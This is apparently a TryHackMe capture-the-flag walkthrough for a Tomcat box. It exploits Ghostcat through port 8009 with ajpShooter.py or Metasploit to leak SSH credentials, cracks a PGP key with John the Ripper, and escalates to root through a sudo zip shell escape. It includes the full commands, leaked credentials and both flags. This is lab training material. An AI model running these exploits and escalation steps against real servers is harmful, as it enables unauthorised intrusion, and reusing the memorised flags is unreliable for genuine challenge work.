In this CTF (Capture the Flag) challenge walkthrough, we will be hacking into an Apache Tomcat server using an exploit created by a Chinese developer.
This exploit is available as a standalone Python file and as a Metasploit module.
In the walkthrough video, Iโll demonstrate both methods of gaining an initial foothold into the box. We will use a trusty hash cracking tool, John the ripper to decrypt a password from two files found on the target machine.
Logging in as the second user, we can leverage our permissions to run the zip bin as root in order to retrieve the root flag.
Please note that this box contains a username with foul language. If you are easily offended by bad words, please donโt continue reading this walkthrough.
ENUMERATION
First, letโs export our IPs and enumerate with nmap.
export myIP=10.6.2.23 export targetIP=10.10.225.99 sudo nmap -Pn -sC -p- -O $targetIP
Next we will look further into the port 8009 service ajp13 with some searching on Google. We quickly discover that it looks like a tomcat apache server that has a vulnerability that can be exploited with Ghostcat.ย
INITIAL FOOTHOLD WITH GHOSTCAT
Using metasploit with the ghostcat module, we can retrieve the first userโs username and password. Also of interest is port 8080 running an HTTP-proxy. This is probably a webpage we can look at in a browser.ย
The other method for retrieving the first username and password is to run the following command to use ajpShooter.py directly without metasploit:
python ajpShooter.py http://10.10.176.124:8080 8009 /WEB-INF/web.xml read
---
_ _ __ _ _
/_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __
//_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
/ _ \| | |_) | _\ \ | | | (_) | (_) | || __/ |
\_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_|
|__/|_|
00theway,just for test
[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>
</web-app>
****
**---**
SSH INTO THE TARGET MACHINE
Now that we have retrieved the user:password, we can go ahead an SSH into the box.
ssh skyfuck@10.10.176.124 Password: 8730281lkjlkjdqlksalks
During further enumeration, we discovered two files: tryhackme.asc, and credential.pgp. These files will probably help us uncover another hidden string. The .pgp file contains a hash that, when cracked, reveals a key to decrypt the .asc file.
First, we need to transfer both files to our attacker machine so that we can use john the ripper to decrypt the hash. We can use SCP (secure copy protocol to transfer the files).
The following commands allow us to uncover the hidden string, which turns out to be another username:password combination.
sudo scp skyfuck@10.10.91.141:/home/skyfuck/credential.pgp ~/THM/tomghost/credential.pgp sudo scp skyfuck@10.10.91.141:/home/skyfuck/tryhackme.asc ./tomghost/tryhackme.asc
DECRYPTING THE HIDDEN SECRET WITH JOHN THE RIPPER
On our attacker machine we can run john2hash to nicely convert the .asc file into a new file packed up for john the ripper, titled โhashโ.
john2hash tryhackme.asc > hash
And finally, we can run john the ripper now to decrypt the credential.pgp file.
John --wordlist=/home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou/rockyou.txt hash
The rockyou.txt file is a leaked database of passwords that is often used in pentesting. Once we crack the hash, we will use the following commands to decrypt the credential.pgp file.
gpg --import tryhackme.asc sudo gpg --decrypt credential.pgp
And we have it!
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j%
!!!
THM{GhostCat_1s_so_cr4sy}
!!!
EXPLOITING SUDO PERMISSIONS ON ZIP
First, we need to switch over the user Merlin with:
su merlin
We discover with a sudo -l search that we have sudo permissions to run the zip bin.
Over on GTFObins we find a privilege escalation vector using zip to maintain SUDO permissions and retrieve the root flag:
merlin@ubuntu:/usr/bin$ TF=$(mktemp -u)
merlin@ubuntu:/usr/bin$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# whoami
root
# cd /root
# ls
root.txt ufw
# cat root.txt
THM{Z1P_1S_FAKE}
Thanks for reading/watching my walkthrough. Also make sure to check out my other TryHackMe tutorials:
๐ Recommended: TryHackMe – Capture the Flag Mr. Robot
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.